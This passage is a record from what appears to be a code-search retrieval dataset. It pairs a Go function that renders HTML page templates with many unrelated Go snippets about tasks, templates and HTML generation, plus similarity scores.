{\n\t\treturn fmt.Errorf(\"Unable to retrieve next ten of the user's events: %v\", err)\n\t}\n\tfmt.Println(\"These are your upcoming events on your calendar\")\n\tif len(events.Items) == 0 {\n\t\tfmt.Println(\"You have no upcoming events on your calendar.\")\n\t} else {\n\t\ttable := tablewriter.NewWriter(os.Stdout)\n\t\ttable.SetHeader([]string{\"ID\", \"NAME\", \"DATE\"})\n\t\tdt := [][]string{}\n\t\tfor _, item := range events.Items {\n\t\t\tdate := item.Start.DateTime\n\t\t\tif date == \"\" {\n\t\t\t\tdate = item.Start.Date\n\t\t\t}\n\t\t\tdt = append(dt, []string{item.Id, item.Summary, date})\n\t\t}\n\t\tfor _, t := range dt {\n\t\t\ttable.Append(t)\n\t\t}\n\t\ttable.Render()\n\t}\n\treturn nil\n}", "func getTasks(encoder *json.Encoder) {\n\tvar realMap = map[string]Task{}\n\t// this function takes a key value pair of the sync.Map and adds it to the realMap map Variable\n\t// the convert function returns a bool because sync.Map.range() requires it in order to stop on error\n\tconvert := func(key interface{}, value interface{}) bool {\n\t\tkeyString, err := key.(string) // verifying the value is of the required type with type assertion\n\t\tif !err {\n\t\t\tfmt.Println(\"Key errror, key is not string\")\n\t\t\treturn false\n\t\t}\n\t\tvalueTask, err := value.(Task) // verifying the value is of the required type with type assertion\n\t\tif !err {\n\t\t\tfmt.Println(\"Key errror, key is not string\")\n\t\t\treturn false\n\t\t}\n\t\trealMap[keyString] = valueTask // insert the value to the new map\n\t\treturn true\n\t}\n\tTodoList.Range(convert)\n\terr := encoder.Encode(realMap)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n}", "func ShowTaskStat(taskJSON []byte, scale float64) error {\n\ttask := Task{}\n\n\terror := json.Unmarshal([]byte(taskJSON), &task)\n\tif error != nil {\n\t\treturn errors.New(\"[ERROR] Couldn't parse task log as JSON:\" + string(taskJSON))\n\t}\n\n\tstartDateTime, _ := time.Parse(DateTimeLayout, task.Start)\n\tendDateTime, _ := time.Parse(DateTimeLayout, task.End)\n\n\t// TODO: もうちょっとフォーマット何とかする\n\tduration := float64(endDateTime.Sub(startDateTime).Seconds()) * scale\n\tminutes := duration / 60.0\n\thours := minutes / 60.0\n\n\t// 小数点丸め\n\tfmt.Fprintf(os.Stdout, \"%s %v\\n\", task.Name, math.Trunc(hours*100)/100.0)\n\treturn nil\n}", "func ReadTasks(rows *sql.Rows, a *Task) error {\n\treturn rows.Scan(&a.TID, &a.BID, &a.TLID, &a.Name, &a.Worker, &a.DtDue, &a.DtPreDue, &a.DtDone, &a.DtPreDone, &a.FLAGS, &a.DoneUID, &a.PreDoneUID, &a.Comment, &a.CreateTS, &a.CreateBy, &a.LastModTime, &a.LastModBy)\n}", "func CommandShowActive(conf Config, ctx, query Query) error {\n\tts, err := LoadTaskSet(conf.Repo, conf.IDsFile, false)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tquery = query.Merge(ctx)\n\tts.Filter(query)\n\tts.FilterByStatus(STATUS_ACTIVE)\n\tts.DisplayByNext(ctx, true)\n\n\treturn nil\n}", "func (t *Task) MarkDoneForToday() {\n t.SnoozedUntil = floorDate(time.Now().Add(time.Hour * 24))\n}", "func (s *TaskService) List() ([]Task, *http.Response, error) {\n\tresObj := new(TaskResponse)\n\tresp, err := s.sling.New().\n\t\tQueryStruct(CreateFunctionParam(\"gettasks\")).\n\t\tReceiveSuccess(resObj)\n\tif resObj != nil && len(resObj.Results) > 0 {\n\t\tif resObj.Results[0].ErrorDesc != nil {\n\t\t\treturn nil, resp, Error{*resObj.Results[0].ErrorDesc}\n\t\t}\n\t\treturn *(&resObj.Results), resp, err\n\t}\n\treturn make([]Task, 0), resp, err\n}", "func (t Task) DisplayString() string {\n var nextTimeString string\n if !t.Complete && time.Now().Before(t.SnoozedUntil) {\n nextTimeString = \"(\" + getSnoozeString(t.SnoozedUntil) + \") \"\n } else if t.Complete {\n nextTimeString = \"(Done!) \"\n }\n var dueString string\n if !t.UserDueDate.IsZero() && strings.TrimSpace(util.GetDueDateString(t.UserDueDate)) != \"\" {\n dueString = \", \" + util.GetDueDateString(t.UserDueDate) \n }\n var groupString string\n if strings.TrimSpace(t.Group) != \"\" {\n groupString = \", in group \" + t.Group\n }\n return nextTimeString + t.Name + dueString + groupString\n}", "func CollectTasksWithStatus(entity ProjectEntity, status string, filterLocal bool) ([]*ecs.Task, error) {\n\trequest := constructListPagesRequest(entity, status, filterLocal)\n\tresult := []*ecs.Task{}\n\n\terr := entity.Context().ECSClient.GetTasksPages(request, func(respTasks []*ecs.Task) error {\n\t\tresult = append(result, respTasks...)\n\t\treturn nil\n\t})\n\n\treturn result, err\n}", "func (s *API) ListTasks(req *ListTasksRequest, opts ...scw.RequestOption) (*ListTasksResponse, error) {\n\tvar err error\n\n\tdefaultPageSize, exist := s.client.GetDefaultPageSize()\n\tif (req.PageSize == nil || *req.PageSize == 0) && exist {\n\t\treq.PageSize = &defaultPageSize\n\t}\n\n\tquery := url.Values{}\n\tparameter.AddToQuery(query, \"page\", req.Page)\n\tparameter.AddToQuery(query, \"page_size\", req.PageSize)\n\tparameter.AddToQuery(query, \"domain\", req.Domain)\n\tparameter.AddToQuery(query, \"organization_id\", req.OrganizationID)\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"GET\",\n\t\tPath: \"/domain/v2alpha2/tasks\",\n\t\tQuery: query,\n\t\tHeaders: http.Header{},\n\t}\n\n\tvar resp ListTasksResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func (tb *TaskBuilder) Show() string {\n\treturn fmt.Sprintf(`SHOW TASKS LIKE '%v' IN DATABASE \"%v\"`, EscapeString(tb.name), EscapeString(tb.db))\n}", "func (q taskQuery) All(ctx context.Context, exec boil.ContextExecutor) (TaskSlice, error) {\n\tvar o []*Task\n\n\terr := q.Bind(ctx, exec, &o)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"models: failed to assign all query results to Task slice\")\n\t}\n\n\tif len(taskAfterSelectHooks) != 0 {\n\t\tfor _, obj := range o {\n\t\t\tif err := obj.doAfterSelectHooks(ctx, exec); err != nil {\n\t\t\t\treturn o, err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn o, nil\n}", "func (ts *TaskService) List(reqdata *TaskListRequest) (*TaskListResponse, *http.Response, error) {\n\n\tu := fmt.Sprintf(\"tasks/list\")\n\n\tu, err := addOptions(u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := ts.client.NewRequest(\"POST\", u, reqdata)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar result *TaskListResponse\n\tresp, err := ts.client.Do(req, &result)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn result, resp, nil\n}", "func filterTaskList(taskData []interface{}, context *restrictedOperationContext) ([]interface{}, error) {\n\tfilteredTaskData := make([]interface{}, 0)\n\n\tfor _, task := range taskData {\n\t\ttaskObject := task.(map[string]interface{})\n\t\tif taskObject[taskServiceIdentifier] == nil {\n\t\t\treturn nil, ErrDockerTaskServiceIdentifierNotFound\n\t\t}\n\n\t\tserviceID := taskObject[taskServiceIdentifier].(string)\n\t\ttaskObject, access := applyResourceAccessControl(taskObject, serviceID, context)\n\t\tif !access {\n\t\t\ttaskLabels := extractTaskLabelsFromTaskListObject(taskObject)\n\t\t\ttaskObject, access = applyResourceAccessControlFromLabel(taskLabels, taskObject, taskLabelForStackIdentifier, context)\n\t\t}\n\n\t\tif access {\n\t\t\tfilteredTaskData = append(filteredTaskData, taskObject)\n\t\t}\n\t}\n\n\treturn filteredTaskData, nil\n}" ]
[ "0.66608703", "0.6363134", "0.6344397", "0.6213848", "0.62006146", "0.6058636", "0.6033776", "0.58819395", "0.57965875", "0.5790721", "0.57706666", "0.5739463", "0.56952196", "0.5594698", "0.55859876", "0.5566456", "0.55315256", "0.5515459", "0.55154085", "0.55049855", "0.54520154", "0.54255307", "0.5388706", "0.53638744", "0.53565377", "0.534418", "0.53134984", "0.5284718", "0.52746105", "0.5271899", "0.52686274", "0.5268517", "0.5267099", "0.5260292", "0.52600163", "0.5254308", "0.52347195", "0.52315134", "0.52087927", "0.52086294", "0.5193482", "0.51880443", "0.5163034", "0.5135945", "0.51047003", "0.5094908", "0.5076037", "0.50745034", "0.5073251", "0.5057724", "0.50508904", "0.50479007", "0.50393575", "0.5035818", "0.5028517", "0.50164866", "0.49970815", "0.49835", "0.4978999", "0.49708351", "0.4958769", "0.49585766", "0.49538752", "0.49461448", "0.49324656", "0.49312833", "0.48940787", "0.48831522", "0.48649016", "0.4862594", "0.48405877", "0.48283696", "0.48258394", "0.48255506", "0.48202223", "0.48194718", "0.48186597", "0.48062712", "0.47918633", "0.4787609", "0.4778497", "0.47778624", "0.47663575", "0.47657958", "0.4760633", "0.4741628", "0.47280115", "0.4722682", "0.47176188", "0.4711709", "0.47073027", "0.47060242", "0.47042727", "0.469949", "0.46982196", "0.46901253", "0.46854195", "0.46840686", "0.4682604", "0.46745816" ]
0.6969156
0
Carga las plantillas HTML
func cargarPlantilla(w http.ResponseWriter, nombre_plantilla string, pagina *Pagina){ plantillas.ExecuteTemplate(w, nombre_plantilla + ".html", pagina) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func generateHTML(writer http.ResponseWriter, data interface{}, filenames ...string) {\n\n\tvar t *template.Template\n\tvar files []string\n\tfor _, file := range filenames {\n\t\tfiles = append(files, fmt.Sprintf(\"web/ui/template/HTMLLayouts/%s.html\", file))\n\t}\n\tt = template.Must(template.ParseFiles(files...))\n\tt.ExecuteTemplate(writer, \"layout\", data)\n}", "func HTML(c *slurp.C, data interface{}) slurp.Stage {\n\treturn func(in <-chan slurp.File, out chan<- slurp.File) {\n\n\t\ttemplates := html.New(\"\")\n\n\t\tvar wg sync.WaitGroup\n\t\tdefer wg.Wait() //Wait before all templates are executed.\n\n\t\tfor f := range in {\n\n\t\t\tbuf := new(bytes.Buffer)\n\t\t\t_, err := buf.ReadFrom(f.Reader)\n\t\t\tf.Close()\n\t\t\tif err != nil {\n\t\t\t\tc.Println(err)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\ttemplate, err := templates.New(f.Stat.Name()).Parse(buf.String())\n\t\t\tif err != nil {\n\t\t\t\tc.Println(err)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tf.Reader = NewTemplateReadCloser(c, wg, template, data)\n\n\t\t\tout <- f\n\t\t}\n\t}\n}", "func (server Server) Create_Open_Html() {\n\tlayernames := []string{}\n\tfor _,i := range server.Mbtiles {\n\t\tlayernames = append(layernames,Get_Vector_Layers(i)...)\n\t}\n\tfor _,i := range server.Geobufs {\n\t\tlayernames = append(layernames,i.Config_Dynamic.LayerName)\n\t}\n\n\tlayer_parts := []string{}\n\tfor _,layername := range layernames {\n\t\tlayer_parts = append(layer_parts,Get_Part_Layer(layername))\n\t}\n\tmiddle := strings.Join(layer_parts,\"\\n\")\n\tstart,end := Start_End()\n\n\ttotal := start + \"\\n\" + middle + \"\\n\" + end\n\n\tioutil.WriteFile(\"index.html\",[]byte(total),0677)\n\n\texec.Command(\"open\",\"index.html\").Run()\n\n}", "func templatesMy_ordersHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/my_orders.html\")\n\tname := \"templates/my_orders.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func showMenu(db *sql.DB, w http.ResponseWriter) {\n tmpl, _ := template.ParseFiles(\"main_header.html\", \"menu.html\", \"main_footer.html\")\n menu := DrinksMenu{\"Drinks\", getReceipes(db), false}\n\n tmpl.ExecuteTemplate(w, \"main_header\", nil)\n tmpl.ExecuteTemplate(w, \"menu\" , menu)\n tmpl.ExecuteTemplate(w, \"main_footer\", nil)\n}", "func pagemain(w http.ResponseWriter, r *http.Request){\n w.Write([]byte( `\n <!doctype html>\n <title>Ciao</title>\n <h1>Come stai</h1>\n <img src=\"https://www.4gamehz.com/wp-content/uploads/2019/10/league-of-legends-4.jpg\">\n `))\n }", "func templatesCartHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/cart.html\")\n\tname := \"templates/cart.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func templateHTML(releases []models.HelmRelease, w io.Writer) error {\n\n\tsum := internalSummery{\n\t\tOutdatedReleases: make(map[string][]uiHelmRelease),\n\t\tDeprecatedReleases: make(map[string][]uiHelmRelease),\n\t\tGoodReleases: make(map[string][]uiHelmRelease),\n\t}\n\n\tfor _, c := range releases {\n\t\tuiC := uiHelmRelease{\n\t\t\tName: c.Name,\n\t\t\tNamespace: c.Namespace,\n\t\t\tDeprecated: c.Deprecated,\n\t\t\tInstalledVersion: c.InstalledVersion,\n\t\t\tLatestVersion: c.LatestVersion,\n\t\t\tOutdated: c.InstalledVersion != c.LatestVersion,\n\t\t}\n\n\t\tif uiC.Deprecated {\n\t\t\tsum.DeprecatedReleases[uiC.Namespace] = append(sum.DeprecatedReleases[uiC.Namespace], uiC)\n\t\t} else if uiC.Outdated {\n\t\t\tsum.OutdatedReleases[uiC.Namespace] = append(sum.OutdatedReleases[uiC.Namespace], uiC)\n\t\t} else {\n\t\t\tsum.GoodReleases[uiC.Namespace] = append(sum.GoodReleases[uiC.Namespace], uiC)\n\t\t}\n\t}\n\n\tfor i, v := range sum.DeprecatedReleases {\n\t\tsort.Sort(ByName(v))\n\t\tsum.DeprecatedReleases[i] = v\n\t}\n\n\tfor i, v := range sum.OutdatedReleases {\n\t\tsort.Sort(ByName(v))\n\t\tsum.OutdatedReleases[i] = v\n\t}\n\n\tfor i, v := range sum.GoodReleases {\n\t\tsort.Sort(ByName(v))\n\t\tsum.GoodReleases[i] = v\n\t}\n\n\tt := template.Must(template.New(\"index.html\").Funcs(getFunctions()).ParseFS(views, \"views/*\"))\n\terr := t.Execute(w, sum)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func render(w http.ResponseWriter, context PageContext) {\n\tfuncMap := template.FuncMap{\n\t\t\"title\": strings.Title,\n\t\t\"HumanizeBytes\": HumanizeBytes,\n\t\t\"HumanizeBigBytes\": HumanizeBigBytes,\n\t\t\"CommifyFloat\": CommifyFloat,\n\t\t\"Float2Int\": IntFromFloat64,\n\t\t\"OkToBool\": OkToBool,\n\t\t\"tableflip\": func() string { return \"(╯°□°)╯︵ ┻━┻\" },\n\t}\n\tcontext.Static = STATIC_URL\n\ttmpl_list := getTemplateList(context.ViewTemplate)\n\t/*\n\t\tt, err := template.ParseFiles(tmpl_list...)\n\t\tif err != nil {\n\t\t\tlog.Print(\"template parsing error: \", err)\n\t\t}\n\t*/\n\tt := template.Must(template.New(\"base.html\").Funcs(funcMap).ParseFiles(tmpl_list...))\n\terr := t.Execute(w, context)\n\tif err != nil {\n\t\tlog.Print(\"template executing error: \", err)\n\t}\n}", "func (o *OutputHandler) createBeautifulHTML() error {\n\terr := o.importFile()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\to.markdownToHTML()\n\n\terr = o.createFile()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func rederizar( w http.ResponseWriter, r *http.Request){\n\tp:= &Persona{\"Daniel\",26}\n\t\n\t//t = template, err= errror\n\tt, err := template.ParseFiles(\"./views/index.html\")\n\t\n\tif err != nil{\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t}\n\n\tt.Execute(w, p)\n}", "func HTML(opts ...ServerOption) {\n\tsrv, err := initServer(opts...)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\thttp.HandleFunc(\"/\", renderTemplate(srv))\n\n\tlog.Println(\"Listening on :3000...\")\n\terr = http.ListenAndServe(\":3000\", nil)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func HTML() *template.Template {\n\ttemplates, err := fs.Sub(embedFS, \"templates\")\n\tif err != nil {\n\t\tlog.Errorf(\"HTML fs.Sub error: %+v\", err)\n\t}\n\n\tt, err := template.ParseFS(templates, \"*.html\", \"**/*.html\")\n\tif err != nil {\n\t\tlog.Errorf(\"HTML template.ParseFS error: %+v\", err)\n\t}\n\n\tif gin.IsDebugging() {\n\t\tfor _, tmpl := range t.Templates() {\n\t\t\tfmt.Println(tmpl.Name())\n\t\t}\n\t}\n\n\treturn t\n}", "func fileTests() map[string]struct {\n\tsrc string\n\ttree *ast.Tree\n} {\n\tvar render = ast.NewRender(p(3, 7, 29, 61), \"/partial2.html\")\n\trender.Tree = ast.NewTree(\"\", []ast.Node{\n\t\tast.NewText(p(1, 1, 0, 4), []byte(\"<div>\"), ast.Cut{}),\n\t\tast.NewShow(p(1, 6, 5, 17), []ast.Expression{ast.NewIdentifier(p(1, 9, 8, 14), \"content\")}, ast.ContextHTML),\n\t\tast.NewText(p(1, 19, 18, 23), []byte(\"</div>\"), ast.Cut{}),\n\t}, ast.FormatHTML)\n\treturn map[string]struct {\n\t\tsrc string\n\t\ttree *ast.Tree\n\t}{\n\t\t\"/simple.html\": {\n\t\t\t\"<!DOCTYPE html>\\n<html>\\n<head><title>{{ title }}</title></head>\\n<body>{{ content }}</body>\\n</html>\",\n\t\t\tast.NewTree(\"\", []ast.Node{\n\t\t\t\tast.NewText(p(1, 1, 0, 35), []byte(\"<!DOCTYPE html>\\n<html>\\n<head><title>\"), ast.Cut{}),\n\t\t\t\tast.NewShow(p(3, 14, 36, 46), []ast.Expression{ast.NewIdentifier(p(3, 17, 39, 43), \"title\")}, ast.ContextHTML),\n\t\t\t\tast.NewText(p(3, 25, 47, 68), []byte(\"</title></head>\\n<body>\"), ast.Cut{}),\n\t\t\t\tast.NewShow(p(4, 7, 69, 81), []ast.Expression{ast.NewIdentifier(p(4, 10, 72, 78), \"content\")}, ast.ContextHTML),\n\t\t\t\tast.NewText(p(4, 20, 82, 96), []byte(\"</body>\\n</html>\"), ast.Cut{}),\n\t\t\t}, ast.FormatHTML),\n\t\t},\n\t\t\"/simple2.html\": {\n\t\t\t\"<!DOCTYPE html>\\n<html>\\n<body>{{ render \\\"/partial2.html\\\" }}</body>\\n</html>\",\n\t\t\tast.NewTree(\"\", []ast.Node{\n\t\t\t\tast.NewText(p(1, 1, 0, 28), []byte(\"<!DOCTYPE html>\\n<html>\\n<body>\"), ast.Cut{}),\n\t\t\t\trender,\n\t\t\t\tast.NewText(p(3, 37, 59, 73), []byte(\"</body>\\n</html>\"), ast.Cut{}),\n\t\t\t}, ast.FormatHTML),\n\t\t},\n\t\t\"/partial2.html\": {\n\t\t\t\"<div>{{ content }}</div>\",\n\t\t\tnil,\n\t\t},\n\t}\n}", "func init() {\n\ttpl = template.Must(template.New(\"\").Funcs(fm).ParseFiles(\"tpl.gohtml\"))\n}", "func main() {\n\terr := tpl.ExecuteTemplate(os.Stdout, \"tpl.gohtml\", nil)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n}", "func (this *Asset) buildHTML() template.HTML {\n\tvar tag_fn func(string) template.HTML\n\tswitch this.assetType {\n\tcase ASSET_JAVASCRIPT:\n\t\ttag_fn = js_tag\n\tcase ASSET_STYLESHEET:\n\t\ttag_fn = css_tag\n\tdefault:\n\t\tError(\"Unknown asset type\")\n\t\treturn \"\"\n\t}\n\tvar result template.HTML\n\tfor _, assetFile := range this.result {\n\t\tresult += tag_fn(\"/\" + assetFile.Path)\n\t}\n\treturn result\n}", "func outHTML(config *MainConfig, fileFunc FileResultFunc) {\n\n\tindexPath := filepath.Join(config.Outpath, FILE_NAME_HTML_INDEX)\n\terr := SFFileManager.WirteFilepath(indexPath, []byte(assets.HTML_INDEX))\n\n\tif nil != err {\n\t\tfileFunc(indexPath, ResultFileOutFail, err)\n\t} else {\n\t\tfileFunc(indexPath, ResultFileSuccess, nil)\n\t}\n\n\tsrcPath := filepath.Join(config.Outpath, FILE_NAME_HTML_SRC)\n\terr = SFFileManager.WirteFilepath(srcPath, []byte(assets.HTML_SRC))\n\n\tif nil != err {\n\t\tfileFunc(srcPath, ResultFileOutFail, err)\n\t} else {\n\t\tfileFunc(srcPath, ResultFileSuccess, nil)\n\t}\n\n}", "func templatesLayoutNavHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/layout/nav.html\")\n\tname := \"templates/layout/nav.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func init() {\n\ttpl = template.Must(template.New(\"\").Funcs(fn).ParseFiles(\"index.gohtml\"))\n}", "func createFileStructure() {\n\tlit.Debug(\"Enter Create File Structure\")\n\tpath := \"form\"\n\tos.MkdirAll(path, 0777)\n\tcreateFile(path, \"Header.tmpl\", false, \"{{ define \\\"Header\\\" }} \\n<!DOCTYPE html> \\n<html lang=\\\"en-US\\\"> \\n\\t<head> \\n\\t\\t<title>Golang MySQL CRUD Spawner</title> \\n\\t\\t<meta charset=\\\"UTF-8\\\" /> \\n\\t</head> \\n\\t<body> \\n\\t\\t<h1>Golang MySQL CRUD Spawner</h1> \\n{{ end }}\")\n\tcreateFile(path, \"Edit.tmpl\", false, \"{{ define \\\"Edit\\\" }}\\n\\t{{ template \\\"Header\\\" }}\\n\\t\\t{{ template \\\"Menu\\\" }}\\n\\t\\t<h2>Edit Name and City</h2>\\n\\t\\t<form method=\\\"POST\\\" action=\\\"update\\\">\\n\\t\\t\\t<input type=\\\"hidden\\\" name=\\\"uid\\\" value=\\\"{{ .Id }}\\\" />\\n\\t\\t\\t<label> Name </label><input type=\\\"text\\\" name=\\\"name\\\" value=\\\"{{ .Name }}\\\" /><br />\\n\\t\\t\\t<label> City </label><input type=\\\"text\\\" name=\\\"city\\\" value=\\\"{{ .City }}\\\" /><br />\\n\\t\\t\\t<input type=\\\"submit\\\" value=\\\"Save user\\\" />\\n\\t\\t</form><br />\\n\\t{{ template \\\"Footer\\\" }}\\n{{ end }}\")\n\tcreateFile(path, \"Footer.tmpl\", false, \"{{ define \\\"Footer\\\" }}\\n</body>\\n\\n</html>\\n{{ end }}\")\n\tcreateFile(path, \"Index.tmpl\", false, \"{{ define \\\"Index\\\" }}\\n\\t{{ template \\\"Header\\\" }}\\n\\t\\t{{ template \\\"Menu\\\" }}\\n\\t\\t<h2> Registered </h2>\\n\\t\\t<table border=\\\"1\\\">\\n\\t\\t\\t<thead>\\n\\t\\t\\t\\t<tr>\\n\\t\\t\\t\\t\\t<td>ID</td>\\n\\t\\t\\t\\t\\t<td>Name</td>\\n\\t\\t\\t\\t\\t<td>City</td>\\n\\t\\t\\t\\t\\t<td>View</td>\\n\\t\\t\\t\\t\\t<td>Edit</td>\\n\\t\\t\\t\\t\\t<td>Delete</td>\\n\\t\\t\\t\\t</tr>\\n\\t\\t\\t</thead>\\n\\t\\t\\t<tbody>\\n\\t\\t\\t\\t{{ range . }}\\n\\t\\t\\t\\t<tr>\\n\\t\\t\\t\\t\\t<td>{{ .Id }}</td>\\n\\t\\t\\t\\t\\t<td> {{ .Name }} </td>\\n\\t\\t\\t\\t\\t<td>{{ .City }} </td>\\n\\t\\t\\t\\t\\t<td><a href=\\\"/show?id={{ .Id }}\\\">View</a></td>\\n\\t\\t\\t\\t\\t<td><a href=\\\"/edit?id={{ .Id }}\\\">Edit</a></td>\\n\\t\\t\\t\\t\\t<td><a href=\\\"/delete?id={{ .Id }}\\\">Delete</a></td>\\n\\t\\t\\t\\t</tr>\\n\\t\\t\\t\\t{{ end }}\\n\\t\\t\\t</tbody>\\n\\t\\t</table>\\n\\t{{ template \\\"Footer\\\" }}\\n{{ end }}\")\n\tcreateFile(path, \"Menu.tmpl\", false, \"{{ define \\\"Menu\\\" }}\\n<a href=\\\"/\\\">HOME</a> | \\n<a href=\\\"/new\\\">NEW</a>\\n{{ end }}\")\n\tcreateFile(path, \"New.tmpl\", false, \"call New.tmpl file inside form.\\n\\n{{ define \\\"New\\\" }}\\n\\t{{ template \\\"Header\\\" }}\\n\\t\\t{{ template \\\"Menu\\\" }}\\n\\t\\t<h2>New Name and City</h2>\\n\\t\\t<form method=\\\"POST\\\" action=\\\"insert\\\">\\n\\t\\t\\t<label> Name </label><input type=\\\"text\\\" name=\\\"name\\\" /><br />\\n\\t\\t\\t<label> City </label><input type=\\\"text\\\" name=\\\"city\\\" /><br />\\n\\t\\t\\t<input type=\\\"submit\\\" value=\\\"Save user\\\" />\\n\\t\\t</form>\\n\\t{{ template \\\"Footer\\\" }}\\n{{ end }}\")\n\tcreateFile(path, \"Show.tmpl\", false, \"{{ define \\\"Show\\\" }}\\n\\t{{ template \\\"Header\\\" }}\\n\\t\\t{{ template \\\"Menu\\\" }}\\n\\t\\t<h2> Register {{ .Id }} </h2>\\n\\t\\t\\t<p>Name: {{ .Name }}</p>\\n\\t\\t\\t<p>City: {{ .City }}</p><br /> <a href=\\\"/edit?id={{ .Id }}\\\">Edit</a></p>\\n\\t{{ template \\\"Footer\\\" }}\\n{{ end }}\")\n\n}", "func CreateHTML(w io.Writer, header, body string) error {\n\tbox := packr.New(\"MyBox\", \"templates\")\n\tindex, err := box.FindString(\"index.html\")\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tpage := template.New(\"page\")\n\tpage, err = page.Parse(index)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvalues := struct {\n\t\tHead string\n\t\tBody string\n\t}{\n\t\tHead: header,\n\t\tBody: strings.TrimLeft(strings.TrimRight(body, \"\\n\"), \"\\n\"),\n\t}\n\n\terr = page.Execute(w, values)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func init() {\n\t// name must be set when using Execute, can be empty when using ExecuteTemplate, because there naem must be given\n\ttpl = template.Must(template.New(\"\").Funcs(fm).ParseGlob(\"tpl/*.gohtml\"))\n}", "func generateHTML(domain, pkg, source string) ([]byte, error) {\n\tvar (\n\t\tdir, file, redirect string\n\t\tb bytes.Buffer\n\t)\n\n\tif pkg != \"\" {\n\t\tredirect = \"https://pkg.go.dev/\" + domain + \"/\" + pkg\n\n\t\t// Add the URL scheme if not already present\n\t\tif !strings.HasPrefix(source, \"http\") {\n\t\t\tsource = \"https://\" + source\n\t\t}\n\n\t\t// Deduce go-source paths for the hosting\n\t\tswitch path := urlMustParse(source); path.Host {\n\t\tcase \"github.com\":\n\t\t\tdir = source + \"/tree/master/{dir}\"\n\t\t\tfile = source + \"/blob/master/{dir}/{file}#L{line}\"\n\t\tcase \"gitlab.com\":\n\t\t\tdir = source + \"/-/tree/master/{dir}\"\n\t\t\tfile = source + \"/-/blob/master/{dir}/{file}#L{line}\"\n\t\t}\n\t} else {\n\t\tredirect = \"https://\" + domain\n\t}\n\n\tt := template.Must(template.New(\"package\").Parse(templString))\n\terr := t.Execute(&b, &templValue{redirect, domain, pkg, source, dir, file})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn b.Bytes(), nil\n}", "func templatesLayoutBaseHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/layout/base.html\")\n\tname := \"templates/layout/base.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func templatesLoginHtml() (*asset, error) {\n\tpath := filepath.Join(rootDir, \"templates/login.html\")\n\tname := \"templates/login.html\"\n\tbytes, err := bindataRead(path, name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfi, err := os.Stat(path)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"Error reading asset info %s at %s: %v\", name, path, err)\n\t}\n\n\ta := &asset{bytes: bytes, info: fi}\n\treturn a, err\n}", "func (e *explorer) outputGoHTML(goSource, funcName string, lines [][2]int, step int, subStep string) error {\n\t// Get Chroma Go lexer.\n\tlexer := lexers.Get(\"go\")\n\tif lexer == nil {\n\t\tlexer = lexers.Fallback\n\t}\n\t//lexer = chroma.Coalesce(lexer)\n\t// Get Chrome style.\n\tstyle := styles.Get(e.style)\n\tif style == nil {\n\t\tstyle = styles.Fallback\n\t}\n\t// Get Chroma HTML formatter.\n\tformatter := html.New(\n\t\thtml.TabWidth(3),\n\t\thtml.WithLineNumbers(),\n\t\thtml.WithClasses(),\n\t\thtml.LineNumbersInTable(),\n\t\t//html.HighlightLines(lines),\n\t)\n\t// Generate syntax highlighted Go code.\n\titerator, err := lexer.Tokenise(nil, goSource)\n\tif err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\tgoCode := &bytes.Buffer{}\n\tif err := formatter.Format(goCode, style, iterator); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\t// Generate Go HTML page.\n\thtmlContent := &bytes.Buffer{}\n\tdata := map[string]interface{}{\n\t\t\"FuncName\": funcName,\n\t\t\"Style\": 